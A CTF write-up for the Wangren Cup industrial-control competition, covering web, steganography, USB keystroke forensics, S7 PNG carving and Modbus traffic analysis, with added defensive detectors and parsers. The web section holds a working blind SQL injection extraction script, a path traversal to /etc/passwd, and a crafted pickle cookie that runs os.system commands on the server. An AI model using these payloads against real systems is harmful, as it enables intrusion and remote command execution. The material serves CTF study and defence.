First 网刃杯 (Wangren Cup) ICS CTF WriteUp

Apart from the slightly odd scoring mechanism, the challenges overall were pretty good.

WEB

ez-sql

Original challenge: InCTF 2021 Web writeups · 语雀 (yuque.com)

import requests

# Challenge endpoint; sql1 carries a double-URL-encoded a'a and the query
# fragment is appended to sql2.
url = 'http://116.62.239.41:4323/?sql1=%2561%2527%2561&sql2='

# Candidate characters, tried in this order; '.' comes last and marks
# "no character matched".
s = '}{zaqwsxcderfvbgtyhnmjuiklop0123456789.'


def strtohex(s):
    """Encode a string as a 0x... hex literal so the payload needs no quotes."""
    ss = "0x"
    for i in s:
        ss += str(hex(ord(i))).replace("0x", '')
    return ss


# partial result from an earlier run: 53a2d36d72760586dfc400e54b54
flag = ''
for j in range(1, 100):
    for i in s:
        if j >= 1 and j <= 6:
            # first six characters: match the known prefix plus one candidate
            payload = strtohex(flag + i + "%")
        else:
            # afterwards: slide a window of the last six known characters
            payload = strtohex("%" + flag[-6:] + i + "%")
        sql = f'password,username from user where password like {payload} union select 1'
        res = requests.get(url + sql).text
        if res == 'nop':   # 'nop' is the true branch of the boolean oracle
            flag += i
            print(flag)
            break
        if i == ".":       # alphabet exhausted without a match: finished
            print(flag)
            exit(0)
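As an added defender-side example, not part of the original writeup: the loop above sends one request per candidate character, each carrying a hex-encoded LIKE pattern and a UNION, and the sql1 parameter is double URL-encoded (%2561 decodes to %61 and only then to a). Those traits are what a log-based detector should key on. The script below scans constructed access-log lines in combined log format (all IPs, timestamps and user agents invented for this example) and flags source addresses that issue repeated requests containing union/select, LIKE 0x... literals, or query strings that only fully decode after a second pass.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed sample log (combined format) in the shape the blind-injection
# loop produces: one request per candidate character. Not a real capture.
SAMPLE_LOG = """\
10.0.0.5 - - [15/May/2022:10:01:02 +0800] "GET /?sql1=%2561%2527%2561&sql2=password,username%20from%20user%20where%20password%20like%200x3525%20union%20select%201 HTTP/1.1" 200 3 "-" "python-requests/2.27.1"
10.0.0.5 - - [15/May/2022:10:01:02 +0800] "GET /?sql1=%2561%2527%2561&sql2=password,username%20from%20user%20where%20password%20like%200x3625%20union%20select%201 HTTP/1.1" 200 3 "-" "python-requests/2.27.1"
10.0.0.5 - - [15/May/2022:10:01:03 +0800] "GET /?sql1=%2561%2527%2561&sql2=password,username%20from%20user%20where%20password%20like%200x3725%20union%20select%201 HTTP/1.1" 200 3 "-" "python-requests/2.27.1"
10.0.0.5 - - [15/May/2022:10:01:03 +0800] "GET /?sql1=%2561%2527%2561&sql2=password,username%20from%20user%20where%20password%20like%200x3825%20union%20select%201 HTTP/1.1" 200 3 "-" "python-requests/2.27.1"
10.0.0.9 - - [15/May/2022:10:02:10 +0800] "GET /?sql1=alice&sql2=username HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [15/May/2022:10:02:11 +0800] "GET /static/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of boolean-blind / union probing, matched against the decoded query.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "hex_like": re.compile(r"\blike\s+0x[0-9a-f]+", re.I),
    "tautology": re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}


def decode_query(path):
    """Return the query string fully decoded and whether a second decoding
    pass changed it (double encoding such as %2527 is a classic way past a
    filter that decodes only once)."""
    query = urlsplit(path).query
    once = unquote(query)
    twice = unquote(once)
    return twice, twice != once


def classify_request(path):
    """Set of indicator names present in one request path (empty if clean)."""
    decoded, double_encoded = decode_query(path)
    hits = {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    if double_encoded:
        hits.add("double_encoded")
    return hits


def detect_sqli_probing(log_text, threshold=3):
    """Per source IP, count requests carrying injection indicators and the
    distinct payloads seen; return the IPs at or above the threshold."""
    per_ip = defaultdict(lambda: {"hits": 0, "payloads": set(), "indicators": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["path"])
        if not hits:
            continue
        entry = per_ip[m["ip"]]
        entry["hits"] += 1
        entry["payloads"].add(decode_query(m["path"])[0])
        entry["indicators"] |= hits
    return {ip: e for ip, e in per_ip.items() if e["hits"] >= threshold}


if __name__ == "__main__":
    for ip, entry in detect_sqli_probing(SAMPLE_LOG).items():
        print(ip, entry["hits"], sorted(entry["indicators"]))
```

The distinct-payload count matters as much as the hit count: a blind extraction loop produces many near-identical requests that differ by one character, which a rate limit alone would not distinguish from a busy legitimate client.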

ez-web

?pic=/etc/passwd: there is a directory traversal. The response carries the "image" as base64, and decoding it gives the source file.

The classic /app/app.py; requesting it yields the source code.

A quick audit shows the point being tested is pickle deserialization:

Python deserialization attacks from scratch: how pickle works & RCE without reduce (zhihu.com)

Combining the command execution with the arbitrary file read takes it straight away.

import requests
import base64

# e = 'ls / -a'
e = 'cat /.ffffffffllllllllllllaaaaag'
# Hand-built pickle: builds a __main__.User object and routes its
# __setstate__ through os.system, writing the command output to /tmp/1.txt
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode() + b' > /tmp/1.txt\nb.'
# The server unpickles the base64 'user' cookie; the ?pic= traversal then
# reads /tmp/1.txt back out.
response = requests.get("http://116.62.239.41:4322/?pic=/tmp/1.txt",
                        cookies=dict(user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())
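Added example on the defending side, not code from the challenge or from this writeup: the server accepts the user cookie as a raw base64 pickle, so any global the client names in it gets imported. Three checks close that off: a static scan with pickletools.genops that lists every global the blob would import before load() runs, a restricted Unpickler whose find_class only allows a short list of builtins, and an HMAC tag over the blob so a client-modified cookie is rejected before unpickling happens at all. The allowed-globals list, the signing key and the sample blobs are assumptions made for this example.

```python
import base64
import hashlib
import hmac
import io
import pickle
import pickletools

# Globals an untrusted session blob may reference (assumed policy for this
# example); os.system, subprocess.*, builtins.eval etc. are refused.
ALLOWED_GLOBALS = {
    "builtins": {"dict", "list", "set", "frozenset", "tuple", "str", "int", "float", "bool", "bytes"},
}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data):
    """List every (module, name) the pickle would import, without executing it.
    GLOBAL/INST carry 'module name' inline; STACK_GLOBAL (protocol 4) takes
    the two string pushes that precede it."""
    refs, recent = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(recent) >= 2:
            refs.append((recent[-2], recent[-1]))
        if op.name in STRING_OPS:
            recent = (recent + [arg])[-2:]
    return refs


class RestrictedUnpickler(pickle.Unpickler):
    """Second line of defence: refuse any global not on the allow list."""

    def find_class(self, module, name):
        if name in ALLOWED_GLOBALS.get(module, ()):
            return getattr(__import__(module), name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))


def safe_loads(data):
    """Static scan first, then load under the restricted unpickler."""
    bad = [r for r in referenced_globals(data) if r[1] not in ALLOWED_GLOBALS.get(r[0], ())]
    if bad:
        raise pickle.UnpicklingError("refused, blob references %r" % bad)
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_loads(data):
    """(True, obj) or (False, reason), for callers that want to log refusals."""
    try:
        return True, safe_loads(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


def sign(blob, key):
    """HMAC-SHA256 tag so a cookie rewritten by the client fails before unpickling."""
    return hmac.new(key, blob, hashlib.sha256).digest()


def make_cookie(obj, key):
    """Server side: base64(pickle || 32-byte tag)."""
    blob = pickle.dumps(obj)
    return base64.b64encode(blob + sign(blob, key)).decode()


def verified_loads(cookie_value, key):
    """Server side: verify the tag in constant time, then safe_loads the blob."""
    raw = base64.b64decode(cookie_value)
    blob, tag = raw[:-32], raw[-32:]
    if len(tag) != 32 or not hmac.compare_digest(sign(blob, key), tag):
        raise ValueError("cookie signature mismatch")
    return safe_loads(blob)


# Constructed samples: a benign session, and a blob that only references
# os.system (it pushes the function and stops; nothing is ever called).
BENIGN = pickle.dumps({"user": "alice", "admin": False})
SUSPICIOUS = b"cos\nsystem\n."

if __name__ == "__main__":
    print(referenced_globals(SUSPICIOUS), try_safe_loads(SUSPICIOUS)[0])
    key = b"constructed-demo-key"
    print(verified_loads(make_cookie({"user": "bob"}, key), key))
```

The signature check should come first in production: with it in place the unpickler only ever sees blobs the server itself produced, and the allow list is the safety net for the day the key leaks. Where the session only holds JSON-shaped data, the cleaner fix is to drop pickle entirely.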

Got it.

[Image 1]

MISC

Sign-in challenge

Download: two txt files, cipher and flag. flag.txt contains zero-width steganography; decoding it gives:

[Image 2]

"myself" refers to flag.txt: take its md5, then Rabbit-decrypt with that as the key.

[Image 3]

Baby-Usb

Not much to say...

FzWjScJ/knm: mouse and keyboard traffic capture forensics (github.com)

Extract the keystrokes from the capture directly with the tool, giving:

congratulationsonfindingmebutiwillnottellyouwherethepasswordofworddocumentisgoandfinditagain

But that alone isn't useful; there may have been deletions and the like, so I wrote a script and looked at the full key sequence directly.

#!/usr/bin/env python3
# coding: utf-8
import sys
import os

DataFileName = "usb.dat"

presses = []

# USB HID usage IDs -> characters (unshifted and shifted). Control keys are
# kept as markers such as <DEL> so that deletions remain visible in the output.
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<tab>","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","4f":"<右方向>","50":"<左方向>","51":"<下方向>","52":"<上方向>"}

shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<tab>","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","4f":"<右方向>","50":"<左方向>","51":"<下方向>","52":"<上方向>"}


def main():
    # get argv
    pcapFilePath = sys.argv[1]

    # dump the HID report of every USB packet with tshark
    os.system("tshark -r %s -T fields -e usb.capdata > %s" % (pcapFilePath, DataFileName))

    # read data
    with open(DataFileName, "r") as f:
        for line in f:
            presses.append(line.rstrip("\n"))

    # handle: byte 0 of a report is the modifier mask, byte 2 the first key code
    result = ""
    for press in presses:
        press = press.replace(":", "")
        if len(press) < 6:
            continue  # empty line or a report too short to be a keyboard report
        try:
            a = int(press[0:2], 16)
            key = press[4:6]
            if a == 0:
                if key != "00" and normalKeys.get(key):
                    result += normalKeys[key]
            elif a & 2 or a & 32:  # shift key is pressed.
                if key != "00" and shiftKeys.get(key):
                    result += shiftKeys[key]
            else:
                print("[-] Unknown Key : %s" % key)
        except ValueError:
            print("[-] Bad line : %s" % press)
    print("[+] Found : %s" % result)

    # clean the temp data
    os.remove(DataFileName)


if __name__ == "__main__":
    main()

[Image 4]

Joining up the deleted characters gives:

the key is qazwsxedcrfv

Decrypt the Word document with it to get the flag.
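An added example of the reconstruction step, not the writeup's script: rather than reading the <DEL> markers by hand, replay the HID reports into an edit buffer and keep whatever backspace removes. The key table is a small subset of the map above, and the report sequence is constructed for the example (the user types "key", erases it, then types "Flag1").

```python
# Minimal USB HID usage-ID table for this example: letters, digits, a few controls.
HID_KEYS = {0x04 + i: chr(ord("a") + i) for i in range(26)}
HID_KEYS.update({0x1e + i: str(i + 1) for i in range(9)})
HID_KEYS.update({0x27: "0", 0x28: "\n", 0x2c: " ", 0x2d: "-", 0x2e: "="})
SHIFT_DIGITS = dict(zip("1234567890", "!@#$%^&*()"))
BACKSPACE = 0x2a
SHIFT_MASK = 0x22  # left (0x02) or right (0x20) shift bit of the modifier byte


def decode_report(report_hex):
    """One 8-byte boot-keyboard report -> character, 'BACKSPACE', or None for
    a key release / unknown code. Byte 0 = modifiers, byte 2 = first key.
    Accepts both '00:00:04:...' and '0000040000000000' tshark styles."""
    raw = bytes.fromhex(report_hex.replace(":", ""))
    if len(raw) < 3:
        return None
    modifiers, code = raw[0], raw[2]
    if code == 0:
        return None
    if code == BACKSPACE:
        return "BACKSPACE"
    ch = HID_KEYS.get(code)
    if ch is None:
        return None
    if modifiers & SHIFT_MASK:
        ch = SHIFT_DIGITS.get(ch, ch.upper())
    return ch


def reconstruct(reports):
    """Replay keystrokes into an edit buffer. Returns (final_text, deleted),
    where deleted holds the characters removed by backspace in the order
    they were deleted (so a word erased right-to-left comes out reversed)."""
    buffer, deleted = [], []
    for rep in reports:
        key = decode_report(rep)
        if key is None:
            continue
        if key == "BACKSPACE":
            if buffer:                      # backspace on an empty buffer is a no-op
                deleted.append(buffer.pop())
            continue
        buffer.append(key)
    return "".join(buffer), "".join(deleted)


# Constructed sample: "key" typed, erased with three backspaces, then "Flag1".
# Every press is followed by the all-zero release report a real keyboard sends.
SAMPLE_REPORTS = [
    "00:00:0e:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # k
    "00:00:08:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # e
    "00:00:1c:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # y
    "00:00:2a:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # backspace x3
    "00:00:2a:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:2a:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "02:00:09:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # Shift+f
    "00:00:0f:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # l
    "00:00:04:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # a
    "00:00:0a:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # g
    "00:00:1e:00:00:00:00:00", "00:00:00:00:00:00:00:00",  # 1
]

if __name__ == "__main__":
    final, deleted = reconstruct(SAMPLE_REPORTS)
    print("typed:", repr(final), "deleted:", repr(deleted))
```

Like the script above, this counts every report with a non-zero key code as one press; a key held long enough for auto-repeat produces several identical reports and would be counted several times, so duplicate consecutive reports are worth collapsing when working on a real capture.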

Protocol analysis

The secret hidden in S7

Filter for s7 directly in Wireshark; a PNG header turns up at the start of this packet's data.

[Image 5]

Concatenate the contents of the following few packets and save the result as a PNG.

[Image 6]

Hmm, the PNG height; adjust it and the flag appears.

[Image 7]
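Added example (not from the writeup) of the carve-and-fix step: join the S7 data payloads, cut from the PNG signature to the IEND chunk, and rewrite the IHDR height together with its CRC. Changing only the height bytes in a hex editor leaves the IHDR CRC wrong, which strict decoders report; recomputing it avoids that. The sample image and its split into payloads are fabricated here.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, data):
    """length || type || data || CRC32(type || data), as the PNG spec lays it out."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_png(width, height, rgb_rows):
    """Tiny valid 8-bit RGB PNG, used only to fabricate test data."""
    raw = b"".join(b"\x00" + row for row in rgb_rows)   # filter type 0 per row
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b"")


def carve_png(payloads):
    """Join payloads in capture order, find the signature and walk chunk
    headers up to IEND. Returns the PNG bytes, the remainder of the data if
    IEND never arrives (truncated transfer), or None if no signature."""
    data = b"".join(payloads)
    start = data.find(PNG_SIG)
    if start < 0:
        return None
    pos = start + len(PNG_SIG)
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length
        if ctype == b"IEND":
            return data[start:pos]
    return data[start:]


def chunks(png):
    """Yield (type, data, stored_crc) for every complete chunk."""
    pos = len(PNG_SIG)
    while pos + 12 <= len(png):
        length = struct.unpack(">I", png[pos:pos + 4])[0]
        if pos + 12 + length > len(png):
            break
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])[0]
        yield ctype, data, crc
        pos += 12 + length


def crc_ok(png):
    """True when every chunk's stored CRC matches its type+data."""
    return all(zlib.crc32(t + d) == c for t, d, c in chunks(png))


def dimensions(png):
    return struct.unpack(">II", png[16:24])


def set_height(png, new_height):
    """Rewrite the IHDR height and recompute the IHDR CRC; bytes 16..29 are
    the 13-byte IHDR payload, 29..33 its CRC."""
    ihdr = png[16:20] + struct.pack(">I", new_height) + png[24:29]
    return png[:16] + ihdr + struct.pack(">I", zlib.crc32(b"IHDR" + ihdr)) + png[33:]


# Constructed sample: a 2x1 image split across three "S7 payloads"; the first
# carries junk bytes before the signature and the last trailing bytes after
# IEND, standing in for neighbouring protocol data.
ORIGINAL = build_png(2, 1, [b"\xff\x00\x00\x00\xff\x00"])
SAMPLE_PAYLOADS = [b"\x32\x07\x00\x00" + ORIGINAL[:20], ORIGINAL[20:45], ORIGINAL[45:] + b"\x00\x00"]

if __name__ == "__main__":
    carved = carve_png(SAMPLE_PAYLOADS)
    print(dimensions(carved), crc_ok(carved), crc_ok(set_height(carved, 2)))
```

Raising the height does not add pixel data; the decoder simply keeps reading the existing IDAT stream, which is why hidden rows appended below the declared height become visible after the edit.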

Seasoned hacker

The challenge attachments all seem to be the same one...

2021 CTF Industrial Information Security Skills Competition - Damaged Wind Turbine, 夜白君's blog - CSDN blog

Ah, they're all about the same anyway; just filter for modbus.

The challenge mentions 5000; 5000 in hex is 1388, so look for data values greater than 1388.

[Image 8]

Watch the write traffic.

[Image 9]

That gives the first data value. For the second, the challenge says it is a read error, so that is the read following the write.

[Image 10]

The flag is flag{22b81194}.
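Added example, not part of the writeup: the same filtering done programmatically. The parser handles the MBAP header, Write Single/Multiple Registers (function codes 6 and 16) and exception responses (function code with bit 0x80 set, which is what a "read error" looks like on the wire), and find_anomalies flags writes above the 5000 limit and every exception. The frames are constructed for this example, not taken from the challenge capture.

```python
import struct


def parse_modbus_tcp(frame):
    """Parse one Modbus/TCP ADU (7-byte MBAP header + PDU). Returns the
    transaction id, unit id, function code, exception code (for responses
    with FC|0x80) and any register writes as (address, value) pairs."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP + function code")
    tid, pid, length, uid, fc = struct.unpack(">HHHBB", frame[:8])
    if pid != 0:
        raise ValueError("protocol id %d is not Modbus" % pid)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame size" % length)
    data = frame[8:]
    rec = {"tid": tid, "unit": uid, "fc": fc & 0x7F, "exception": None, "writes": []}
    if fc & 0x80:
        rec["exception"] = data[0] if data else None
    elif fc == 0x06:   # Write Single Register: request and response carry addr + value
        addr, value = struct.unpack(">HH", data[:4])
        rec["writes"] = [(addr, value)]
    elif fc == 0x10:   # Write Multiple Registers
        addr, qty = struct.unpack(">HH", data[:4])
        # only the request carries byte count + values; the response echoes addr + qty
        if len(data) >= 5 and data[4] == 2 * qty:
            values = struct.unpack(">%dH" % qty, data[5:5 + 2 * qty])
            rec["writes"] = list(zip(range(addr, addr + qty), values))
    return rec


EXCEPTION_NAMES = {1: "ILLEGAL FUNCTION", 2: "ILLEGAL DATA ADDRESS",
                   3: "ILLEGAL DATA VALUE", 4: "SLAVE DEVICE FAILURE"}


def find_anomalies(frames, max_value=5000):
    """Flag register writes above max_value and every exception response,
    in capture order. Each alert is a tuple starting with the transaction id."""
    alerts = []
    for frame in frames:
        rec = parse_modbus_tcp(frame)
        if rec["exception"] is not None:
            name = EXCEPTION_NAMES.get(rec["exception"], "code %d" % rec["exception"])
            alerts.append((rec["tid"], "exception", rec["fc"], name))
        for addr, value in rec["writes"]:
            if value > max_value:
                alerts.append((rec["tid"], "write_over_limit", addr, value))
    return alerts


# Constructed frames (hex), not from the challenge capture.
SAMPLE_FRAMES = [bytes.fromhex(h) for h in (
    "0001 0000 0006 01 06 0001 0fa0",               # write reg 1 = 4000, within limit
    "0002 0000 0006 01 06 0001 1770",               # write reg 1 = 6000, over limit
    "0003 0000 0006 01 03 0000 000a",               # read 10 holding registers
    "0003 0000 0003 01 83 02",                      # exception reply to that read
    "0004 0000 000b 01 10 0010 0002 04 1388 1389",  # write regs 16,17 = 5000,5001
)]

if __name__ == "__main__":
    for alert in find_anomalies(SAMPLE_FRAMES):
        print(alert)
```

Matching the exception reply to its request goes through the transaction id (3 in the sample), which is the field to pivot on when the question is "which read failed after that write".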
